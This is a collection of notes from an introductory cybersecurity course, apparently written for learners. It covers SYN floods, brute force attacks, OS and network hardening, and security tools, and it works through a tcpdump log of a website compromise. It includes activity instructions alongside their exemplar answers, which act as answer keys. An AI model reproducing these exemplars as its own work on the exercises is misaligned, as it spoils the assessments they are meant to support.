Step 4: Explain how the attack is causing the website to
malfunction
Review the Wireshark reading from step 2, then write your analysis in section two of the
Cybersecurity incident report template provided.
When writing your report, discuss the network devices and activities that are involved in
the interruption. Include the following information in your explanation:
Describe the attack. What are the main symptoms or characteristics of this specific
type of attack?
● Explain how it affected the organization’s network. How does this specific network
attack affect the website and how it functions?
● Describe the potential consequences of this attack and how it negatively affects the
organization.
● Optional: Suggest potential ways to secure the network so this attack can be
prevented in the future.
●
What to Include in Your Response
Be sure to address the following in your completed activity:
●
●
The name of the network intrusion attack
A description of how the attack negatively impacts network performance
Activity Exemplar: Analyze network attacks
Section 1: Identify the type of attack that may have caused this
network interruption
One potential explanation for the website’s connection timeout error message is a DoS
attack. The logs show that the web server stops responding after it is overloaded with
SYN packet requests. This event could be a type of DoS attack called SYN flooding.
Section 2: Explain how the attack is causing the website malfunction
When the website visitors try to establish a connection with the web server, a three-way
handshake occurs using the TCP protocol. The handshake consists of three steps:
1. A SYN packet is sent from the source to the destination, requesting to connect.
2. The destination replies to the source with a SYN-ACK packet to accept the
connection request. The destination will reserve resources for the source to
connect.
3. A final ACK packet is sent from the source to the destination acknowledging the
permission to connect.
In the case of a SYN flood attack, a malicious actor will send a large number of SYN
packets all at once, which overwhelms the server’s available resources to reserve for the
connection. When this happens, there are no server resources left for legitimate TCP
connection requests.
The logs indicate that the web server has become overwhelmed and is unable to process
the visitors’ SYN requests. The server is unable to open a new connection to new visitors
who receive a connection timeout message.
Glossary terms from module 3
Terms and definitions from Course 3, Module 3
Active packet sniffing: A type of attack where data packets are manipulated in transit
Botnet: A collection of computers infected by malware that are under the control of a single threat actor,
known as the “bot-herder"
Denial of service (DoS) attack: An attack that targets a network or server and floods it with network
traffic
Distributed denial of service (DDoS) attack: A type of denial of service attack that uses multiple devices
or servers located in different locations to flood the target network with unwanted traffic
Internet Control Message Protocol (ICMP): An internet protocol used by devices to tell each other about
data transmission errors across the network
Internet Control Message Protocol (ICMP) flood: A type of DoS attack performed by an attacker
repeatedly sending ICMP request packets to a network server
IP spoofing: A network attack performed when an attacker changes the source IP of a data packet to
impersonate an authorized system and gain access to a network
On-path attack: An attack where a malicious actor places themselves in the middle of an authorized
connection and intercepts or alters the data in transit
Packet sniffing: The practice of capturing and inspecting data packets across a network
Passive packet sniffing: A type of attack where a malicious actor connects to a network hub and looks at
all traffic on the network
Ping of death: A type of DoS attack caused when a hacker pings a system by sending it an oversized ICMP
packet that is bigger than 64KB
Replay attack: A network attack performed when a malicious actor intercepts a data packet in transit
and delays it or repeats it at another time
Smurf attack: A network attack performed when an attacker sniffs an authorized user’s IP address and
floods it with ICMP packets
Synchronize (SYN) flood attack: A type of DoS attack that simulates a TCP/IP connection and floods a
server with SYN packets
Module 4 – Security Hardening
I want to take a moment to congratulate you on your progress so far. First, you learned about
network operations. Then, you learned about the tools and protocols that help network systems
function. Next, you learned how vulnerabilities in networks expose them to various security
intrusions. Now, we'll discuss security hardening. Then, we'll learn about OS hardening, explore
network hardening practices, and discuss cloud hardening practices. Security hardening can be
implemented in devices, networks, applications, and cloud infrastructure. Security analysts may
perform tasks, such as patch updates and backups, as part of security hardening. We'll discuss these
tasks as you progress through the course. As a security analyst, hardening will play a major role in
your day-to-day tasks, which is why it's important for you to understand how it works.
Security analysts and the organizations they work with must be proactive about protecting
systems from attack. This is where security hardening comes in. Security hardening is the process
of strengthening a system to reduce its vulnerability and attack surface. All the potential
vulnerabilities that a threat actor could exploit are referred to as a system's attack surface. Let's use
an example that compares a network to a house. The attack surface would be all the doors and
windows that a robber could use to gain access to that house. Just like putting locks on all the doors
and windows in the house, security hardening involves
minimizing the attack surface or potential vulnerabilities and keeping a network as secure as
possible. As part of security hardening, security analysts perform regular maintenance procedures
to keep network devices and systems functioning securely and optimally. Security hardening can be
conducted on any device or system that can be compromised, such as hardware, operating systems,
applications, computer networks, and databases. Physical security is also a part of security
hardening. This may include securing a physical space with security cameras and security guards.
Some common types of hardening procedures include software updates, also called patches, and
device application configuration changes. These updates and changes are done to increase security
and fix security vulnerabilities on a network. An example of a security configuration change would
be requiring longer passwords or
more frequent password changes. This makes it harder for a malicious actor to gain login
credentials. An example of a configuration check is updating the encryption standards for data that is
stored in a database. Keeping encryption up to date makes it harder for malicious actors to access
the database. Other examples of security hardening include removing or disabling unused
applications and services, disabling unused ports, and reducing access permissions across devices
and network. Minimizing the number of applications,
devices, ports, and access permissions makes network and device monitoring more efficient and
reduces the overall attack surface, which is one of the best ways to secure an organization. Another
important strategy for security hardening is to conduct regular penetration testing. A penetration
test, also called a pen test, is a simulated attack that helps identify vulnerabilities in a system,
network, website, application, and process. Penetration testers document their findings in a report.
Depending on where the test fails, security teams can determine the type of security vulnerabilities
that require fixing. Organizations can then review these vulnerabilities and come up with a plan to
fix them. Coming up, you'll learn more about how security hardening is an essential aspect of
securing networks. It's a foundational part of
network security that strengthens the network to reduce the number of successful attacks.
OS Hardening
The operating system is the interface between computer hardware and the user. The OS is the first
program loaded when a computer turns on. The OS acts as an intermediary between software
applications and the computer hardware. It's important to secure the OS in each system because
one insecure OS can lead to a whole network being compromised. There are many types of
operating systems, and they all share similar security hardening practices. Let's talk about some of
those security hardening practices that are recommended to secure an OS. Some OS hardening
tasks are performed at regular intervals, like updates, backups, and keeping an up-to-date list of
devices and authorized users. Other tasks are performed only once as part of preliminary safety
measures. One example would be configuring a device setting to fit a secure encryption standard.
Let's begin with OS hardening tasks that are performed at a regular interval, such as patch
installation, also known as patch updates. A patch update is a software and operating system, or OS,
update that addresses security vulnerabilities within a program or product. Now we'll discuss patch
updates provided to the company by the OS software vendor. With patch updates, the OS should be
upgraded to its latest software version. Sometimes patches are released to fix a security
vulnerability in the software. As soon as OS vendors publish a patch and the vulnerability fix,
malicious actors know exactly where the vulnerability is in systems running the out-of-date OS.
This is why it's important for organizations to run patch updates as soon as they are released. For
example, my team had to perform an emergency patch to address a recent vulnerability found in a
commonly used programming library. The library is used almost everywhere, so we had to quickly
patch most of our servers and applications to fix the vulnerability. The newly updated OS should be
added to the baseline configuration, also called the baseline image. A baseline configuration is a
documented set of specifications within a system that is used as a basis for future builds, releases,
and updates. For example, a baseline may contain a firewall rule with a list of allowed and
disallowed network ports. If a security team suspects unusual activity affecting the OS, they can
compare the current configuration to the baseline and make sure that nothing has been changed.
Another hardening task performed regularly is hardware and software disposal. This ensures that all
old hardware is properly wiped and disposed of. It's also a good idea to delete any unused software
applications since some popular programming languages have known vulnerabilities. Removing
unused software makes sure that there aren't any unnecessary vulnerabilities connected with the
programs that the software uses. The final OS hardening technique that we'll discuss is
implementing a strong password policy. Strong password policies require that passwords follow
specific rules. For example, an organization may set a password policy that requires a minimum of
eight characters, a capital letter, a number, and a symbol. To discourage malicious actors, a
password policy usually states that a user will lose access to the network after entering the wrong
password a certain number of times in a row. Some systems also require multi-factor
authentication, or MFA. MFA is a security measure which requires a user to verify their identity in
two or more ways to access a system or network. Ways of identifying yourself include something
you know, like a password, something you have like an ID card, or something unique about you, like
your fingerprint. To review, OS hardening is a set of procedures that maintains OS security and
improves it. Security measures like access privileges and password policies frequently undergo
regular security checks as part of OS hardening.
Brute force attacks and OS hardening
In this reading, you’ll learn about brute force attacks. You’ll consider how vulnerabilities can be assessed
using virtual machines and sandboxes and learn ways to prevent brute force attacks using a
combination of authentication measures. Implementing various OS hardening tasks can help prevent
brute force attacks. An attacker can use a brute force attack to gain access and compromise a network.
Usernames and passwords are among the most common and important security controls in place today.
They are used and enforced on everything that stores or accesses sensitive or private information, like
personal phones, computers, and restricted applications within an organization. However, a major issue
with relying on login credentials as a critical line of defense is that they’re vulnerable to being stolen and
guessed by malicious actors.
Brute force attacks
A brute force attack is a trial-and-error process of discovering private information. There are different
types of brute force attacks that malicious actors use to guess passwords, including:
●
●
Simple brute force attacks. When attackers try to guess a user's login credentials, it’s considered
a simple brute force attack. They might do this by entering any combination of usernames and
passwords that they can think of until they find the one that works.
Dictionary attacks use a similar technique. In dictionary attacks, attackers use a list of commonly
used passwords and stolen credentials from previous breaches to access a system. These are
called “dictionary” attacks because attackers originally used a list of words from the dictionary
to guess the passwords, before complex password rules became a common security practice.
Using brute force to access a system can be a tedious and time consuming process, especially when it’s
done manually. There are a range of tools attackers use to conduct their attacks.
Assessing vulnerabilities
Before a brute force attack or other cybersecurity incident occurs, companies can run a series of tests on
their network or web applications to assess vulnerabilities. Analysts can use virtual machines and
sandboxes to test suspicious files, check for vulnerabilities before an event occurs, or to simulate a
cybersecurity incident.
Virtual machines (VMs)
Virtual machines (VMs) are software versions of physical computers. VMs provide an additional layer of
security for an organization because they can be used to run code in an isolated environment,
preventing malicious code from affecting the rest of the computer or system. VMs can also be deleted
and replaced by a pristine image after testing malware.
VMs are useful when investigating potentially infected machines or running malware in a constrained
environment. Using a VM may prevent damage to your system in the event its tools are used improperly.
VMs also give you the ability to revert to a previous state. However, there are still some risks involved
with VMs. There’s still a small risk that a malicious program can escape virtualization and access the
host machine.
You can test and explore applications easily with VMs, and it’s easy to switch between different VMs
from your computer. This can also help in streamlining many security tasks.
Sandbox environments
A sandbox is a type of testing environment that allows you to execute software or programs separate
from your network. They are commonly used for testing patches, identifying and addressing bugs, or
detecting cybersecurity vulnerabilities. Sandboxes can also be used to evaluate suspicious software,
evaluate files containing malicious code, and simulate attack scenarios.
Sandboxes can be stand-alone physical computers that are not connected to a network; however, it is
often more time- and cost-effective to use software or cloud-based virtual machines as sandbox
environments. Note that some malware authors know how to write code to detect if the malware is
executed in a VM or sandbox environment. Attackers can program their malware to behave as harmless
software when run inside these types of testing environments.
Prevention measures
Some common measures organizations use to prevent brute force attacks and similar attacks from
occurring include:
●
●
Salting and hashing: Hashing converts information into a unique value that can then be used to
determine its integrity. It is a one-way function, meaning it is impossible to decrypt and obtain
the original text. Salting adds random characters to hashed passwords. This increases the length
and complexity of hash values, making them more secure.
Multi-factor authentication (MFA) and two-factor authentication (2FA): MFA is a security
measure which requires a user to verify their identity in two or more ways to access a system or
network. This verification happens using a combination of authentication factors: a username
●
●
and password, fingerprints, facial recognition, or a one-time password (OTP) sent to a phone
number or email. 2FA is similar to MFA, except it uses only two forms of verification.
CAPTCHA and reCAPTCHA: CAPTCHA stands for Completely Automated Public Turing test to tell
Computers and Humans Apart. It asks users to complete a simple test that proves they are
human. This helps prevent software from trying to brute force a password. reCAPTCHA is a free
CAPTCHA service from Google that helps protect websites from bots and malicious software.
Password policies: Organizations use password policies to standardize good password practices
throughout the business. Policies can include guidelines on how complex a password should be,
how often users need to update passwords, and if there are limits to how many times a user can
attempt to log in before their account is suspended.
Key takeaways
Brute force attacks are a trial-and-error process of guessing passwords. Attacks can be launched
manually or through software tools. Methods include simple brute force attacks and dictionary attacks.
To protect against brute force attacks, cybersecurity analysts can use sandboxes to test suspicious files,
check for vulnerabilities, or to simulate real attacks and virtual machines to conduct vulnerability tests.
Some common measures to prevent brute force attacks include: hashing and salting, MFA and/or 2FA,
CAPTCHA and reCAPTCHA, and password policies.
Activity Overview
In this activity, you will take on the role of a cybersecurity analyst working for a company that hosts the
cooking website, yummyrecipesforme.com. Visitors to the website experience a security issue when
loading the main webpage. Your job is to investigate, identify, document, and recommend a solution to
the security problem.
When investigating the security event, you will review a tcpdump log. You will need to identify the
network protocols used to establish the connection between the user and the website. Network
protocols are the communication rules and standards networked devices use to transmit data.
Unfortunately, malicious actors can also use network protocols to invade and attack private networks.
Knowing how to identify the protocols commonly used in attacks will help you protect your
organization’s network against these types of security events.
To complete the assignment, you will also need to document what occurred during the security incident.
Then, you will recommend one security measure to implement to prevent similar security problems in
the future.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the scenario below. Then complete the step-by-step instructions.
You are a cybersecurity analyst for yummyrecipesforme.com, a website that sells recipes and
cookbooks. A disgruntled baker has decided to publish the website’s best-selling recipes for the public to
access for free.
The baker executed a brute force attack to gain access to the web host. They repeatedly entered several
known default passwords for the administrative account until they correctly guessed the right one. After
they obtained the login credentials, they were able to access the admin panel and change the website’s
source code. They embedded a javascript function in the source code that prompted visitors to
download and run a file upon visiting the website. After running the downloaded file, the customers are
redirected to a fake version of the website where the seller’s recipes are now available for free.
Several hours after the attack, multiple customers emailed yummyrecipesforme’s helpdesk. They
complained that the company’s website had prompted them to download a file to update their browsers.
The customers claimed that, after running the file, the address of the website changed and their personal
computers began running more slowly.
In response to this incident, the website owner tries to log in to the admin panel but is unable to, so they
reach out to the website hosting provider. You and other cybersecurity analysts are tasked with
investigating this security event.
To address the incident, you create a sandbox environment to observe the suspicious website behavior.
You run the network protocol analyzer tcpdump, then type in the URL for the website,
yummyrecipesforme.com. As soon as the website loads, you are prompted to download an executable
file to update your browser. You accept the download and allow the file to run. You then observe that
your browser redirects you to a different URL, greatrecipesforme.com, which is designed to look like the
original site. However, the recipes your company sells are now posted for free on the new website.
The logs show the following process:
1.
2.
3.
4.
5.
6.
7.
The browser requests a DNS resolution of the yummyrecipesforme.com URL.
The DNS replies with the correct IP address.
The browser initiates an HTTP request for the webpage.
The browser initiates the download of the malware.
The browser requests another DNS resolution for greatrecipesforme.com.
The DNS server responds with the new IP address.
The browser initiates an HTTP request to the new IP address.
A senior analyst confirms that the website was compromised. The analyst checks the source code for the
website. They notice that javascript code had been added to prompt website visitors to download an
executable file. Analysis of the downloaded file found a script that redirects the visitors’ browsers from
yummyrecipesforme.com to greatrecipesforme.com.
The cybersecurity team reports that the web server was impacted by a brute force attack. The
disgruntled baker was able to guess the password easily because the admin password was still set to the
default password. Additionally, there were no controls in place to prevent a brute force attack.
Your job is to document the incident in detail, including identifying the network protocols used to
establish the connection between the user and the website. You should also recommend a security
action to take to prevent brute force attacks in the future.
Step 1: Access the template
Link to template:
●
Security incident report template
Step 2
Links to supporting materials:
●
●
DNS & HTTP traffic log
How to read the DNS & HTTP log
Step 3
Imagine that you are one of the cybersecurity analysts in this scenario and you are tasked with
writing an incident report for this security event. Using the DNS & HTTP log file you produced with
tcpdump, determine which network protocol is identified in the packet captures during the
investigation. You will use what you learned about the four layers of the TCP/IP model and which
protocols happen at each layer. If needed, you can review the video and reading about the TCP/IP
model to use as guides for your response. Then review the DNS & HTTP traffic log and record which
protocol you identified in the first section of the security incident report template.
Step 4
Summarize the incident in the second section of the report. Provide as many details and
facts as possible in your documentation. When writing the documentation, be sure to:
Avoid using strong emotional language (good, terrible, awful, etc.).
Include as many facts about the issue as you can, including where the incident
occurred, how it happened, whether anyone witnessed it, how it was discovered,
etc.
● Indicate your sources for information and evidence.
●
●
Writing accurate and detailed documentation for cybersecurity incidents can serve as a
reference point for other cybersecurity analysts. Additionally, quality documentation can
be used to educate other employees about cybersecurity measures taken within the
company when incidents occur and can help businesses comply with various security
audits.
Step 5
After documenting the incident, write one recommendation to help your organization
prevent brute force attacks in the future.
Some of the common security methods used to prevent brute force attacks include:
●
Requiring strong passwords
●
●
●
Enforcing two-factor authentication (2FA)
Monitoring login attempts
Limiting the number of login attempts
Select one security measure and explain why it is effective in section three of the security
incident report template.
The more safety measures that are in place, the less likely a malicious actor will be able to
access sensitive information.
What to Include in Your Response
●
●
●
Name one network protocol identified during the investigation
Document the incident
Recommend one security measure
How to read the DNS & HTTP traffic log
This reading explains how to identify the brute force attack using tcpdump.
14:18:32.192571 IP your.machine.52444 > dns.google.domain: 35084+ A?
yummyrecipesforme.com. (24)
14:18:32.204388 IP dns.google.domain > your.machine.52444: 35084 1/0/0 A 203.0.113.22 (40)
The first section of the DNS & HTTP traffic log file shows the source computer
(your.machine.52444) using port 52444 to send a DNS resolution request to the DNS server
(dns.google.domain) for the destination URL (yummyrecipesforme.com). Then the reply comes back
from the DNS server to the source computer with the IP address of the destination URL
(203.0.113.22).
14:18:36.786501 IP your.machine.36086 > yummyrecipesforme.com.http: Flags [S], seq
2873951608, win 65495, options [mss 65495,sackOK,TS val 3302576859 ecr 0,nop,wscale 7],
length 0
14:18:36.786517 IP yummyrecipesforme.com.http > your.machine.36086: Flags [S.], seq
3984334959, ack 2873951609, win 65483, options [mss 65495,sackOK,TS val 3302576859 ecr
3302576859,nop,wscale 7], length 0
The next section shows the source computer sending a connection request (Flags [S]) from the
source computer (your.machine.36086) using port 36086 directly to the destination
(yummyrecipesforme.com.http). The .http suffix is the port number; http is commonly associated
with port 80. The reply shows the destination acknowledging it received the connection request
(Flags [S.]). The communication between the source and the intended destination continues for
about 2 minutes, according to the timestamps between this block (14:18) and the next DNS
resolution request (see below for the 14:20 timestamp).
TCP Flag codes include:
Flags [S] - Connection Start
Flags [F] - Connection Finish
Flags [P] - Data Push
Flags [R] - Connection Reset
Flags [.] - Acknowledgment
14:18:36.786589 IP your.machine.36086 > yummyrecipesforme.com.http: Flags [P.], seq 1:74,
ack 1, win 512, options [nop,nop,TS val 3302576859 ecr 3302576859], length 73: HTTP: GET /
HTTP/1.1
The log entry with the code HTTP: GET / HTTP/1.1 shows the browser is requesting data from
yummyrecipesforme.com with the HTTP: GET method using HTTP protocol version 1.1. This could
be the download request for the malicious file.
14:20:32.192571 IP your.machine.52444 > dns.google.domain: 21899+ A?
greatrecipesforme.com. (24)
14:20:32.204388 IP dns.google.domain > your.machine.52444: 21899 1/0/0 A 192.0.2.172 (40)
14:25:29.576493 IP your.machine.56378 > greatrecipesforme.com.http: Flags [S], seq
1020702883, win 65495, options [mss 65495,sackOK,TS val 3302989649 ecr 0,nop,wscale 7],
length 0
14:25:29.576510 IP greatrecipesforme.com.http > your.machine.56378: Flags [S.], seq
1993648018, ack 1020702884, win 65483, options [mss 65495,sackOK,TS val 3302989649 ecr
3302989649,nop,wscale 7], length 0
Then, a sudden change happens in the logs. The traffic is routed from the source computer to the
DNS server again using port .52444 (your.machine.52444 > dns.google.domain) to make another
DNS resolution request. This time, the DNS server routes the traffic to a new IP address
(192.0.2.172) and its associated URL (greatrecipesforme.com.http). The traffic changes to a route
between the source computer and the spoofed website (outgoing traffic: IP your.machine.56378 >
greatrecipesforme.com.http and incoming traffic: greatrecipesforme.com.http > IP
your.machine.56378). Note that the port number (.56378) on the source computer has changed
again when redirected to a new website.
Resources for more information
●
An introduction to using tcpdump at the Linux command line: Lists several tcpdump
commands with example output. The article describes the data in the output and explains
why it is useful.
●
tcpdump Cheat Sheet: Lists tcpdump commands, packet capturing options, output options,
protocol codes, and filter options
●
What is a computer port? | Ports in networking: Provides a short list of the most common
ports for network traffic and their associated protocols. The article also provides
information about ports in general and using firewalls to block ports.
●
Service Name and Transport Protocol Port Number Registry: Provides a database of port
numbers with their service names, transport protocols, and descriptions
●
How to Capture and Analyze Network Traffic with tcpdump?: Provides several tcpdump
commands with example output. Then, the article describes each data element in examples
of tcpdump output.
●
Masterclass – Tcpdump – Interpreting Output: Provides a color-coded reference guide to
tcpdump output
Activity Exemplar: Apply OS hardening techniques
Section 1: Identify the network protocol involved in the incident
The protocol impacted in the incident is Hypertext transfer protocol (HTTP). Running
tcpdump and accessing the yummyrecipesforme.com website to detect the problem,
capture protocol, and traffic activity in a DNS & HTTP traffic log file provided the
evidence needed to come to this conclusion. The malicious file is observed being
transported to the users’ computers using the HTTP protocol at the application layer.
Section 2: Document the incident
Several customers contacted the website owner stating that when they visited the
website, they were prompted to download and run a file that asked them to update their
browsers. Their personal computers have been operating slowly ever since. The website
owner tried logging into the web server but noticed they were locked out of their
account.
The cybersecurity analyst used a sandbox environment to test the website without
impacting the company network. Then, the analyst ran tcpdump to capture the network
and protocol traffic packets produced by interacting with the website. The analyst was
prompted to download a file claiming it would update the user’s browser, accepted the
download and ran it. The browser then redirected the analyst to a fake website
(greatrecipesforme.com) that looked identical to the original site
(yummyrecipesforme.com).
The cybersecurity analyst inspected the tcpdump log and observed that the browser
initially requested the IP address for the yummyrecipesforme.com website. Once the
connection with the website was established over the HTTP protocol, the analyst recalled
downloading and executing the file. The logs showed a sudden change in network traffic
as the browser requested a new IP resolution for the greatrecipesforme.com URL. The
network traffic was then rerouted to the new IP address for the greatrecipesforme.com
website.
The senior cybersecurity professional analyzed the source code for the websites and the
downloaded file. The analyst discovered that an attacker had manipulated the website to
add code that prompted the users to download a malicious file disguised as a browser
update. Since the website owner stated that they had been locked out of their
administrator account, the team believes the attacker used a brute force attack to access
the account and change the admin password. The execution of the malicious file
compromised the end users’ computers.
Section 3: Recommend one remediation for brute force attacks
One security measure the team plans to implement to protect against brute force attacks
is two-factor authentication (2FA). This 2FA plan will include an additional requirement
for users to validate their identification by confirming a one-time password (OTP) sent to
either their email or phone. Once the user confirms their identity through their login
credentials and the OTP, they will gain access to the system. Any malicious actor that
attempts a brute force attack will not likely gain access to the system because it requires
additional authorization.
Note: The exemplar represents one possible explanation for the issues that the end users
are facing. Yours will likely differ in certain ways. What’s important is that you identified
the network protocols involved and created a report. In your role as a security analyst, you
and your team would document any issue that occurs on the network and come up with
solutions to help prevent the same issues from occurring in the future. Good quality
documentation can save you and your organization time and potentially manage the attack
early on.
First, analyze the DNS & HTTP traffic log to identify a network protocol. Then, document
the cybersecurity incident. Finally, recommend one security measure your organization
could implement to prevent brute force attacks in the future. Creating this process will, in
turn, help improve the organization’s security posture.
The exemplar is accompanied by the activity, and presents a professional documentation
example to include the following:
●
●
●
One network protocol identified during the investigation
Documentation of the incident
A recommended security measure
Key Takeaways
As a security analyst, you might not always know exactly what is the primary cause of a
network issue or a possible attack. But being able to analyze the protocols involved will
help you make an informed assumption about what happened. This will allow you and your
team to begin resolving the issue.
Quick Explanation on the difference between HTTP Protocol and DNS Protocol
DNS (Domain Name System) and HTTP (Hypertext Transfer Protocol) are two fundamental protocols
used in computer networks, but they serve different purposes and operate at different layers of the
network stack. Here's a breakdown of the key differences between DNS and HTTP:
**1. Purpose:**
- **DNS (Domain Name System):**
- Purpose: DNS is primarily used to translate human-readable domain names (e.g., www.example.com)
into IP addresses (e.g., 192.168.1.1) that computers can use to locate and communicate with web
servers.
- Function: It acts as a distributed database system for translating domain names into IP addresses,
making it easier for users to access websites using memorable domain names.
- **HTTP (Hypertext Transfer Protocol):**
- Purpose: HTTP is a protocol used for fetching web pages and other resources from web servers. It
facilitates the transfer of data, including text, images, videos, and more, between a web client (usually a
web browser) and a web server.
- Function: It defines how data should be structured and transmitted, allowing web browsers to request
web pages and servers to respond with the requested content.
**2. Layer:**
- **DNS:**
- DNS operates at the **Application Layer** of the OSI model (Layer 7). It is part of the application layer
because it provides a service (domain name resolution) to applications like web browsers
- **HTTP:**
- HTTP also operates at the **Application Layer** of the OSI model (Layer 7). It is responsible for
managing the communication between web clients and servers.
**3. Operation:**
- **DNS:**
- DNS is a hierarchical and distributed system that consists of DNS servers worldwide. When a user
enters a domain name in a web browser, the browser queries a DNS server to resolve the domain into an
IP address. DNS servers then recursively search for the IP address associated with the domain and
return it to the browser.
- **HTTP:**
- HTTP operates as a request-response protocol. A web browser (the client) sends an HTTP request to a
web server, specifying the desired resource (e.g., a web page). The web server processes the request and
sends an HTTP response back to the client with the requested content.
**4. Interaction:**
- **DNS:**
- DNS is typically a background process that operates behind the scenes. Users may not directly interact
with DNS, but it plays a crucial role in enabling web browsing by translating domain names into IP
addresses.
- **HTTP:**
- HTTP is directly used by web clients (browsers) to request and retrieve web content. Users interact
with web pages through HTTP when they click on links, submit forms, or perform other web-related
actions.
In summary, DNS and HTTP are both essential protocols for the functioning of the internet, but they
serve distinct purposes. DNS is responsible for translating domain names into IP addresses, while HTTP
is responsible for fetching and displaying web content. Together, they enable users to access websites
using easy-to-remember domain names and interact with web servers to retrieve web pages and other
resources.
Network Hardening
Earlier, you learned that OS hardening focuses on device safety and uses patch updates, secure
configuration, and account access policies. Now we'll focus on network hardening. Network
hardening focuses on network-related security hardening, like port filtering, network access
privileges, and encryption over networks. Certain network hardening tasks are performed regularly,
while others are performed once and then updated as needed. Some tasks that are regularly
performed are firewall rules maintenance, network log analysis, patch updates, and server backups.
Earlier, you learned that a log is a record of events that occurs within an organization's systems.
Network log analysis is the process of examining network logs to identify events of interest.
Security teams use a log analyzer tool or a security information and event management tool, also
known as a SIEM, to conduct network log analysis. A SIEM tool is an application that collects and
analyzes log data to monitor critical activities in an organization. It gathers security data from a
network and presents that data on a single dashboard. The dashboard interface is sometimes called
a single pane of glass. A SIEM helps analysts to inspect, analyze, and react to security events across
the network based on their priority. Reports from the SIEM provide a list of new or ongoing network
vulnerabilities and list them on a scale of priority from high to low, where high priority
vulnerabilities have a much shorter deadline for mitigation. Now that we've covered tasks that are
performed regularly, let's examine tasks that are performed once. These tasks include port filtering
on firewalls, network access privileges, and encryption for communication, among many things. Let's
start with port filtering. Port filtering can be
formed over the network. Port filtering is a firewall function that blocks or allows certain port
numbers to limit unwanted communication. A basic principle is that the only ports that are needed
are the ones that are allowed. Any port that isn't being used by the normal network operations
should be disallowed. This protects against port vulnerabilities. Networks should be set up with the
most up-to-date wireless protocols available and older wireless protocols
should be disabled. Security analysts also use network segmentation to create isolated subnets for
different departments in an organization. For example, they might make one for the marketing
department and one for the finance department. This is done so the issues in each subnet don't
spread across the whole company and only specified users are given access to the part of the
network that they require for their role. Network segmentation may also be used to separate
different security zones. Any restricted zone on a network containing highly classified or
confidential data should be separate from the rest of the network. Lastly, all network
communication should be encrypted using the latest encryption standards. Encryption standards are
rules or methods used to conceal outgoing data and uncover or decrypt incoming data. Data in
restricted zones should have much higher encryption standards, which makes them more difficult
to access. You've learned about the most common hardening practices.
Network security applications
This section of the course covers the topic of network hardening and monitoring. Each device, tool, or
security strategy put in place by security analysts further protects—or hardens—the network until the
network owner is satisfied with the level of security. This approach of adding layers of security to a
network is referred to as defense in depth.
In this reading, you are going to learn about the role of four devices used to secure a network—firewalls,
intrusion detection systems, intrusion prevention systems, and security incident and event management
tools. Network security professionals have the choice to use any or all of these devices and tools
depending on the level of security that they hope to achieve.
This reading will discuss the benefits of layered security. Each tool mentioned is an additional layer of
defense that can incrementally harden a network, starting with the minimum level of security (provided
by just a firewall), to the highest level of security (provided by combining a firewall, an intrusion
detection and prevention device, and security event monitoring).
Take note of where each tool is located on the network. Each tool has its own place in the network’s
architecture. Security analysts are required to understand the network topologies shown in the
diagrams throughout this reading.
Firewall
So far in this course, you learned about stateless firewalls, stateful firewalls, and next-generation
firewalls (NGFWs), and the security advantages of each of them.
Most firewalls are similar in their basic functions. Firewalls allow or block traffic based on a set of rules.
As data packets enter a network, the packet header is inspected and allowed or denied based on its port
number. NGFWs are also able to inspect packet payloads. Each system should have its own firewall,
regardless of the network firewall.
Intrusion Detection System
An intrusion detection system (IDS) is an application that monitors system activity and alerts on possible
intrusions. An IDS alerts administrators based on the signature of malicious traffic.
The IDS is configured to detect known attacks. IDS systems often sniff data packets as they move across
the network and analyze them for the characteristics of known attacks. Some IDS systems review not
only for signatures of known attacks, but also for anomalies that could be the sign of malicious activity.
When the IDS discovers an anomaly, it sends an alert to the network administrator who can then
investigate further.
The limitations to IDS systems are that they can only scan for known attacks or obvious anomalies. New
and sophisticated attacks might not be caught. The other limitation is that the IDS doesn’t stop the
incoming traffic if it detects something awry. It’s up to the network administrator to catch the malicious
activity before it does anything damaging to the network.
When combined with a firewall, an IDS adds another layer of defense. The IDS is placed behind the
firewall and before entering the LAN, which allows the IDS to analyze data streams after network traffic
that is disallowed by the firewall has been filtered out. This is done to reduce noise in IDS alerts, also
referred to as false positives.
Intrusion Prevention System
An intrusion prevention system (IPS) is an application that monitors system activity for intrusive activity
and takes action to stop the activity. It offers even more protection than an IDS because it actively stops
anomalies when they are detected, unlike the IDS that simply reports the anomaly to a network
administrator.
An IPS searches for signatures of known attacks and data anomalies. An IPS reports the anomaly to
security analysts and blocks a specific sender or drops network packets that seem suspect.
The IPS (like an IDS) sits behind the firewall in the network architecture. This offers a high level of
security because risky data streams are disrupted before they even reach sensitive parts of the network.
However, one potential limitation is that it is inline: If it breaks, the connection between the private
network and the internet breaks. Another limitation of IPS is the possibility of false positives, which can
result in legitimate traffic getting dropped.
Full packet capture devices
Full packet capture devices can be incredibly useful for network administrators and security
professionals. These devices allow you to record and analyze all the data that is transmitted over your
network. They also aid in investigating alerts created by an IDS.
Security Information and Event Management
A security information and event management system (SIEM) is an application that collects and analyzes
log data to monitor critical activities in an organization. SIEM tools work in real time to report
suspicious activity in a centralized dashboard. SIEM tools additionally analyze network log data sourced
from IDSs, IPSs, firewalls, VPNs, proxies, and DNS logs. SIEM tools are a way to aggregate security event
data so that it all appears in one place for security analysts to analyze. This is referred to as a single pane
of glass.
Below, you can review an example of a dashboard from Google Cloud’s SIEM tool, Chronicle. Chronicle is
a cloud-native tool designed to retain, analyze, and search data.
Splunk is another common SIEM tool. Splunk offers different SIEM tool options: Splunk Enterprise and
Splunk Cloud. Both options include detailed dashboards which help security professionals to review and
analyze an organization's data. There are also other similar SIEM tools available, and it's important for
security professionals to research the different tools to determine which one is most beneficial to the
organization.
Devices / Tools
Advantages
Disadvantages
A firewall is only able to filter packets
A firewall allows or blocks traffic
Firewall
based on information provided in the
based on a set of rules.
header of the packets.
An IDS can only scan for known attacks or
An IDS detects and alerts admins
Intrusion Detection
obvious anomalies; new and sophisticated
about possible intrusions, attacks,
System (IDS)
attacks might not be caught. It doesn’t
and other malicious traffic.
actually stop the incoming traffic.
An IPS is an inline appliance. If it fails, the
Intrusion
An IPS monitors system activity for
connection between the private network
Prevention System intrusions and anomalies and takes
and the internet breaks. It might detect
(IPS)
action to stop them.
false positives and block legitimate traffic.
A SIEM tool collects and analyzes
Security
A SIEM tool only reports on possible
log data from multiple network
Information and
security issues. It does not take any
machines. It aggregates security
Event Management
actions to stop or prevent suspicious
events for monitoring in a central
(SIEM)
events.
dashboard.
A SIEM tool doesn’t replace the expertise of security analysts, or of the network- and system-hardening
activities covered in this course, but they’re used in combination with other security methods. Security
